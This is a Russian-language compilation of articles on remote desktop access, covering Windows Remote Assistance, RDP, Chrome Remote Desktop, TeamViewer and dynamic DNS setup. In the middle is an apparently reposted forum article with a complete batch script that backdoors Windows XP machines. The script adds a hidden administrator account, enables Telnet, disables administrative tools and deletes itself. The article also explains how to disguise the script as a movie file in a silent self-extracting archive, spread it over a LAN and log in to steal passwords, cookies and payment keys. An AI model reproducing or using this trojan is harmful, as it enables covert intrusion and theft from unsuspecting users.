Удаленный доступ к компьютеру

1. Удалённый помощник (Microsoft Remote Assistance)

  • К каким платформам можно подключаться: Windows.
  • С каких платформ возможно подключение: Windows.

«Удалённый помощник» — встроенная в Windows утилита, благодаря которой можно быстро подключать компьютеры друг к другу без сторонних программ. Этот способ не позволяет обмениваться файлами. Но к вашим услугам полный доступ к удалённому компьютеру, возможность совместной работы с другим пользователем и текстовый чат.

Инструкция для сервера

  1. Запустите утилиту. Для этого наберите в поиске по системе «Удалённый помощник». Если у вас Windows 10, ищите по запросу MsrA. Кликните правой кнопкой мыши по найденному элементу и выберите «Запуск от имени администратора».
  2. В открывшемся окне щёлкните «Пригласить того, кому вы доверяете, для оказания помощи». Если система сообщит, что компьютер не настроен, нажмите «Исправить» и следуйте подсказкам. Возможно, после изменения настроек придётся перезапустить утилиту.
  3. Когда помощник предложит выбрать способ приглашения, кликните «Сохранить приглашение как файл». Затем введите его название, папку хранения и подтвердите создание файла.
  4. Когда файл появится в указанном месте, на экране отобразится окно с паролем. Скопируйте пароль и отправьте его вместе с файлом клиенту по почте или любым другим способом.
  5. Дождитесь запроса на подключение от клиента и одобрите его.

Инструкция для клиента

  1. Откройте файл, созданный сервером, и введите полученный пароль. После этого вы увидите экран удалённого компьютера и сможете наблюдать за ним в специальном окне.
  2. Чтобы управлять файлами и программами чужого компьютера, как будто вы находитесь рядом с ним, кликните в верхнем меню «Запросить управление» и дождитесь ответа от сервера.

Файл и пароль являются одноразовыми, для следующего сеанса они уже не подойдут.

2. Удалённый рабочий стол (Microsoft Remote Desktop)

  • К каким платформам можно подключаться: Windows (только в редакциях Professional, Enterprise и Ultimate).
  • С каких платформ возможно подключение: Windows, macOS, Android и iOS.

Это средство представляет собой ещё одну встроенную в Windows программу, предназначенную для удалённых подключений. От предыдущей она отличается прежде всего тем, что выступающий сервером компьютер нельзя использовать во время подключения. Его экран автоматически блокируется до конца сеанса.

Зато клиентом может быть Mac и даже мобильные устройства. Кроме того, подключённый пользователь может копировать файлы с удалённого компьютера через общий буфер обмена.

Чтобы использовать «Удалённый рабочий стол», нужно правильно настроить сервер. Это займёт у вас некоторое время. Но если не хотите разбираться в IP-адресах и сетевых портах, можете использовать другие программы из этой статьи. Они гораздо проще.

  1. Включите функцию «Удалённый рабочий стол». В Windows 10 это можно сделать в разделе «Параметры» → «Система» → «Удалённый рабочий стол». В старых версиях ОС эта настройках может находиться в другом месте.
  2. Узнайте свои локальный и публичный IP-адреса, к примеру, с помощью сервиса 2IP. Если устройством-клиентом управляет другой человек, сообщите ему публичный IP, а также логин и пароль от своей учётной записи Windows.
  3. Настройте на роутере перенаправление портов (проброс портов или port forwarding). Эта функция открывает доступ к вашему компьютеру для других устройств через интернет. Процесс настройки на разных роутерах отличается, инструкцию для своей модели вы можете найти на сайте производителя.

В общих чертах действия сводятся к следующему. Вы заходите в специальный раздел настроек роутера и создаёте виртуальный сервер, прописывая в его параметрах локальный IP-адрес и порт 3389.

Открытие доступа к компьютеру через перенаправление портов создаёт новые лазейки для сетевых атак. Если боитесь вмешательства злоумышленников, ещё раз подумайте, стоит ли использовать именно этот способ.

  1. Наберите в поиске по системе «Подключение к удалённому рабочему столу» и запустите найденную утилиту. Или нажмите клавиши Win+R, введите команду mstsc и нажмите Enter.
  2. В открывшемся окне введите публичный IP-адрес компьютера, который выступает сервером. Затем укажите логин и пароль от его учётной записи Windows.

После этого вы получите полный контроль над рабочим столом удалённого компьютера.

Загрузить QR-Code Разработчик: Microsoft Corporation Цена: БесплатноЗагрузить QR-Code Разработчик: Microsoft Corporation Цена: БесплатноЗагрузить QR-Code Разработчик: Microsoft Corporation Цена: Бесплатно

3. Удалённый рабочий стол Chrome (Chrome Remote Desktop)

  • К каким платформам можно подключаться: Windows, macOS, Linux.
  • С каких платформ возможно подключение: Windows, macOS, Linux, Android, iOS.

«Удалённый рабочий стол Chrome» — очень простая кросс-платформенная программа для организации удалённого доступа. Её десктопная версия представляет собой приложение для Google Chrome, которое позволяет управлять всей системой без лишних настроек. Но обмениваться файлами между устройствами с её помощью нельзя.

В десктопной версии «Удалённый рабочий стол Chrome» отображаются два раздела меню: «Удалённая поддержка» и «Мои компьютеры». Первый служит для установки подключения между устройствами, не связанными общим аккаунтом Google. Второй позволяет соединять ваши личные устройства, привязанные к одному аккаунту.

Чтобы выполнить подключение, достаточно сгенерировать на стороне сервера код и ввести его на стороне клиента (в настольной или мобильной версии программы).

Мобильное приложение «Удалённый рабочий стол Chrome» предоставляет удалённый доступ к компьютеру. При этом подключаться в обратную сторону — с компьютера к мобильному устройству — нельзя. В то же время десктопная версия может сделать компьютер как клиентом, так и сервером.

Загрузить QR-Code Разработчик: Скачать » Цена: 0 Загрузить QR-Code Разработчик: Google LLC Цена: БесплатноЗагрузить QR-Code Разработчик: Google LLC Цена: Бесплатно

4. TeamViewer

  • К каким платформам можно подключаться: Windows, macOS, Linux, Android, iOS.
  • С каких платформ возможно подключение: Windows, macOS, Linux, Android, iOS.

TeamViewer можно назвать одной из самых известных программ для создания удалённых подключений. Своей популярностью она обязана поддержке множества платформ, простоте использования и количеству функций. Среди прочего программа позволяет записывать сеансы на видео, общаться участникам в голосовом и текстовом чатах и открывать удалённый доступ только к выбранным приложениям.

Чтобы подключить два устройства, нужно сгенерировать на сервере ID и пароль и ввести их на стороне клиента. У TeamViewer очень дружелюбный интерфейс с обилием подсказок, поэтому освоить её очень легко.

Вы можете установить полноценную версию программы либо использовать её портативный вариант QuickSupport. Последний не нуждается в установке, но поддерживает не все возможности TeamViewer. Кроме того, список доступных функций программы меняется в зависимости от используемых платформ.

Загрузить QR-Code Разработчик: TeamViewer Цена: Бесплатно Загрузить QR-Code Разработчик: TeamViewer Цена: Бесплатно

Загрузить TeamViewer или QuickSupport для Windows, Linux и macOS →

Загрузить QR-Code Разработчик: TeamViewer Цена: Бесплатно Загрузить QR-Code Разработчик: TeamViewer Цена: Бесплатно

Простейший скрытый способ получить доступ к нужному ПК из домашней сети

Привет всем, это моя первая статья на хабре, так что не судите строго. В этом посте я опишу как можно получить удаленный доступ к компьютеру пользователя в вашей локальной сети через командную строку, обходя все антивирусы и немного зная синтаксис командной строки Windows. Статья предназначена для использования только на Windows XP, но при желании можно переписать код под любую другую ОС семейства Windows. Итак, приступим. В целом, статья написана для пользователей начального уровня. Самая главная цель — это заполучить нужные данные (пароли, явки, дачи, доступ к почтовым ящикам, файлы ключей webmoney, куки и прочая важная перхоть) и уйти незаметно, не оставив следов проникновения. Итак, начнем, я нахожусь в локальной сети имеющей порядка 5000 пользователей, сеть со статикой или dhcp не имеет значения, мне розан ip адрес и я счастлив. В сети имеется тьма подсетей, роуты которых прописаны на серваке. MAC адрес компа прописан у админа сети, так как в моем случае, это было условие подключения к сетке, таким образом мой мак засветится в случае чего. Во избежание быть найденным, первым делом устанавливаем виртуальную машину (использовал VmWare 5.1), устанавливаем на нее XP, сканер портов (использовал SuperScan 3.00 Скачать можно ) и запускаем службу Telnet. Подключаем виртуальную машину к сети с помощью NAT и получаем таким образом совершенно другой mac-адрес машины смотрящей в сеть. Все гуд виртуалку поставили, идем дальше. Открываем обычный блокнот и пишем батник следующего содержания:
@Echo off
Net user Admin_Support lop /add >nul
Net localgroup net localgroup Ђ¤¬Ё­Ёбва в®ал Admin_support /add >nul
Net accounts /maxpwage:unlimited >nul sc config TlntSvr start= auto >nul
Sc start TlntSvr >nul
Reg add «HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList » /v Admin_support /t REG_DWORD /d 0 >null
Reg add «HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System» /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Reg add «HKCU\SOFTWARE\POLICIES\Microsoft\MMC» /v RestrictPemitSnapins /t Reg_dword /d 1 /f >nul del %SestemRoot%\system32\compmgmt.msc >nul
del Start_game.bat
1. Echo off (думаю всем понятно, объяснять не стоит).
2. Net user Admin_Support lop /add >nul Создаем в системе учетную запись с произвольным логином, в примере: Admin_Support и паролем lop. Учетка появится в списке учетных записей пользователей, можно придумать другое имя, к примеру что-то похожее на SUPPORT_388945a0 (учетная запись поставщика для службы справки и поддержки), на которую большинство пользователей не обращают внимания. Есть 1 нюанс мы создали учетку, но ведь она появится при входе в систему у пользователя, необходимо ее скрыть, об этом будет описано ниже.
3. Net localgroup net localgroup Ђ¤¬Ё­Ёбва в®ал Admin_support /add >nul Добавляем учетку Аdmin_support в группу Администраторы, кодировка слова «Администраторы», как у меня в данном случае «Ђ¤¬Ё­Ёбва в®ал» обязательно должна быть в кодировке DOS. Можно сделать в обычном Far’e. Т.е. то слово у меня уже в кодировке dos.
4. Net accounts /maxpwage:unlimited >nul Период времени в днях, в течение которого будет действовать пароль пользователя. Значение unlimited снимает ограничение по времени. Значение параметра /maxpwage должно быть больше, чем значение параметра /minpwage. Допустимы значения от 1 до 49 710 дней (т. е. значение unlimited равно 49 710 дней), по умолчанию используется значение 90 дней.
5. Sc config TlntSvr start= auto >nul Устанавливаем службу телнет в режим запуска «авто».
6. Sc start TlntSvr >nul Стартуем службу телнет.
7.Reg add “HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList ” /v admin_support /t REG_DWORD /d 0 >null Добавляем ключ в реестр, который скроет нашу учетку в записях в панели управления и при входе в винду (Аутентификации).
8. Reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System” /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Запрещаем запуск редактирования реестра. (Можно обойтись и без этого параметра).
9. Reg add “HKCU\SOFTWARE\POLICIES\Microsoft\MMC” /v RestrictPemitSnapins /t REG_DWORD /d 1 /f >nul
del %SestemRoot%\system32\compmgmt.msc >nul Удаляем mmc (Не обязательный параметр).
10. Reg add “HKCU\SOFTWARE\POLICIES\Microsoft\windows\System” /v DisableCMD /t REG_DWORD /d 2 /f >nul Запрещаю запуск командной строки. (Не обязательный параметр.)
11. Del Start_game.bat Удаляем сам батник.
Батник готов. Сохраняем содержимое блокнота как .bat файл, под любым именем, в моем случае это Start_game.bat
Далее делаем из bat файла exe файл с помощью обычного winrar’a. В параметрах winrar’a устанавливаем параметр «создать архив sfx» и «выполнить после распаковки файл» батник «Start_game.bat». Также в настройках создания архива указываем: распаковывать в скрытом режиме. Помимо этого добавляем к батнику, с помощью того же winrar’a иконку к файлу. Жмем создать архив и получаем exe-шник с иконкой. Работа с Winrar также показана в видеоуроке ниже.
З.Ы. Конечно же можно использовать и другие программы для создания exe файла, которые имеют различный нужный функционал, такой как задание размера файла, типа, скрытия окна распаковки и прочих интересных вещей. В данном примере для большей наглядности я использовал WinRAR.
(Делать можно необязательно exe файл можно создать и другие типы файлов).
Итак мы получили файл с именем Start_game.exe, также можно создать более оригинальный файл с актуальным именем, чтобы пользователи увидев его в сети захотели его скачать, например название фильма, который недавно вышел или скоро должен выйти и его все ждут, (например Трансформеры-3HDTVRip.avi) ну и так далее.
Далее расшариваем папку в сети с нашим Start_game.exe. Как только наш юзверь скачает и запустит наш Start_game.exe, сработает наш батник, и удалится. Открываем нашу виртуальную машину и запускаем сканер портов, где указываем диапозон сканирования нашей сети (в моем случае это 10.16.93.1-10.16.93.255) и порт телнета (22 или 23). Сканер покажет у какого ip адреса открыт порт телнета. Если порт открыт, смело подключаемся, открываем командную строку и подключаемся командой: telnet ip_адрес, где вводим наш логин admin_support и пароль lop. тем самым получаем доступ к командной строке юзверя, и делаем СВОЁ ДЕЛО! ))) Умея пользоваться командной строкой, можно найти и скопировать любые файлы на компьютере пользователя, скрыто установить практически любое нужное программное обеспечение, и много еще чего интересного. Для более наглядного понимания статьи выкладываю реальный видеоурок со своей сети. Урок довольно старый, так как занимался я этим довольно давно.
При желании батник можно доработать для более интересных нужд, в данной статье показан лишь простой способ доступа к ПК пользователя без его ведома.
З.Ы. Единственный минус батника — cmd.exe висит в процессах у пользователя в диспетчере задач. Но я думаю это не так страшно, так как обычные пользователи не особо заморачиваются в знании имени процесса в диспетчере задач.
http://www.youtube.com/watch?v=X5GD4Iu91CU&feature=g-upl&context=G2c89d80AUAAAAAAAAAA

Удаленный доступ к компьютеру или “удалёнка”.

Удаленный доступ или “удалёнка” (Не путать с Удаленной работой.) позволяет через сеть Интернет сидя за одним компьютером, видеть экран другого компьютера и даже работать на нем. Перемещать мышь по экрану, открывать папки, устанавливать и настраивать программы. Нажатия клавиатуры тоже будут передаваться через интернет на этот компьютер. Таким образом можно находясь далеко от компьютера выполнять на нем разные работы – .

Такой способ работы за компьютером особенно любим бухгалтерами, которые сидят дома и работают в 1С на удаленном сервере 😉

Теперь разберем технические подробности на примере компьютеров с Windows. Чтобы организовать удаленный доступ к компьютеру можно использовать:

  • штатные средства Windows, называющиеся RDP
  • стороннее программное обеспечение VNC, TeamViewer, Ammyy Admin , litemanager и другие.

Штатное средство удаленного доступа для Windows подразумевает прямое соединение с компьютером. То есть, если удаленный компьютер находится во внутренней локальной сети (т.е. интернет к нему приходит через роутер), то организовать доступ к этому компьютеру с интернета можно настраивая роутер. ……

RDP (англ.Remote Desktop Protocol — протокол удалённого рабочего стола) — проприетарный протокол прикладного уровня, позаимствованный Microsoft из купленной у PictureTel (ныне известной как Polycom) телекоммуникационной программы Liveshare Plus (названной впоследствии NetMeeting), использующийся для обеспечения удалённой работы пользователя с сервером, на котором запущен сервис терминальных подключений. Клиенты существуют практически для всех версий Windows (включая Windows CE, Phone и Mobile), Linux, FreeBSD, Mac OS X, iOS, Android, Symbian. По умолчанию используется порт TCP 3389. Официальное название Майкрософт для клиентского ПО — Remote Desktop Connection или Terminal Services Client (TSC), в частности, клиент в Windows 2k/XP/2003/Vista/2008/7/8 называется mstsc.exe.

Проблемы и решения.

  • Не раскрывает экран полностью на удалёнке.
  • Шрифт на удалёнке маленький
  • Как запретить доступ к удалёнке
  • Где удаленка на XP?

Удаленно подключиться к компьютеру возможно многими способами. Однако не все из них являются жизнеспособными и/или приемлемыми для домашнего компьютера. Дело в том, что в удаленном доступе задействованы две стороны — ваш локальный компьютер и удаленный компьютер, к которому вы хотели бы подключиться. При этом нужно ответить на два вопроса:

  • Какой программой подключиться?
  • Как найти удаленный компьютер в Интернет?

Для ответа на первый вопрос мы рассмотрим, так называемое, подключение к удаленному рабочему столу. Это наиболее понятный и доступный из способов: все, что выводится на экран удаленного компьютера, передается в окно программы удаленного управления, а все. что вы набираете на клавиатуре, все действия и перемещения мыши в этом окне передаются на него в виде команд, которые он исполняет.

Из рисунка видно, что есть две программы, одна на управляющей стороне, другая на управляемом компьютере. Стандартно обе эти программы являются частью ОС Windows профессиональной версии и выше и поставляются вместе с операционной системой. Владельцам домашних компьютеров, на которых установлена ОС Windows в домашней редакции можно воспользоваться одной из существующих бесплатных программ. Например TightVNC (руководство по настройке на русском языке ).
Ответ на второй вопрос не так прост, как может показаться. При подключении к Интернет ваш компьютер получает адрес. Казалось бы — укажи в программе управления удаленным рабочим столом этот адрес и все. Однако:

  • этот адрес не всегда виден извне (за пределами сети вашего провайдера);
  • он может меняться;
  • его сложно запомнить;
  • и наконец не всякий знает где его искать в настройках Windows.

Здесь на помощь приходит ДинРУ, а в частности ДиноСтарт. ДиноСтарт позволяет вам назначить вашему компьютеру собственное имя. После чего, с помощью небольшой программы (в модемы и маршрутизаторы она уже встроена, но об этом позже) компьютер будет отслеживать все изменения адреса, оставляя имя неизменным.
Возможны два варианта подключения домашнего компьютера к Интернет.

Рассмотрим первый, компьютер непосредственно подключен к сети Интернет-провайдера, как наиболее простой. Все что нужно:

  1. Установить на компьютер программу предоставления удаленного управления рабочим столом¹.
  2. Убедиться что вы назначили для доступа к своему компьютеру надежный пароль².
  3. Назначить в ДиноСтарт имя компьютеру и ввести его, имя для обновлений и пароль для обновлений в программу (рекомендуемое DynDNS ПО можно найти , руководство по настройке ).
  4. Установить на ноутбуке программу управления рабочим столом.
  5. Пойти в кафе и с ноутбука зайти на свой домашний компьютер 😉

Продолжение следует…

¹ Чтобы разгрузить статью и сделать ее более ориентированной на конкретную проблему я намеренно опустил вопрос настройки брандмауэра (или другого firewall ) в Windows.

² В выбору пароля для терминального доступа следует отнестись со всей серьезностью, вы открываете окно в огромный мир и там не все белые и пушистые.

Оставьте комментарий